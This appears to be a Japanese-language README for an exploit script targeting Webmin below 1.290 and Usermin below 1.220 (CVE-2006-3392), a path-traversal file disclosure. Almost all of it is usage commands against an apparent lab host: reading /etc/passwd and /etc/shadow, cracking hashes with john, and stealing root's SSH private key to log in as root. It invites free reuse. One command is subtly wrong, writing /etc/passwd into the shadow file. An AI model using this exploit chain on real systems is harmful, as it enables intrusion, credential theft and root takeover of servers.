
Webmin < 1.290 / Usermin < 1.220 - 任意のファイル開示
https://www.cvedetails.com/cve/CVE-2006-3392/
Webmin 1.290未満およびUsermin 1.220未満では、HTMLをデコードする前にsimplify_path関数を呼び出します。これにより、リモート攻撃者が任意のファイルを読み取ることが可能になります。例えば、"..%01"シーケンスを使用して、"../"シーケンスの除去をバイパスし、その後"%01"などのバイトがファイル名から削除される前に攻撃が行われます。注: これはCVE-2006-3274とは異なる問題です。
ルート権限でファイルシステム上の任意のファイルを閲覧する
./exploit.sh <ターゲットIP> <ターゲットポート> <開示するファイル>
10.10.11.105上でpasswdとshadowを閲覧し、unshadowしてハッシュをクラックする
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<お好みのワードリスト> unshadowed
10.10.11.105上で秘密RSA鍵を閲覧する
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]
いつでもどこでも自由に使用または改変してください。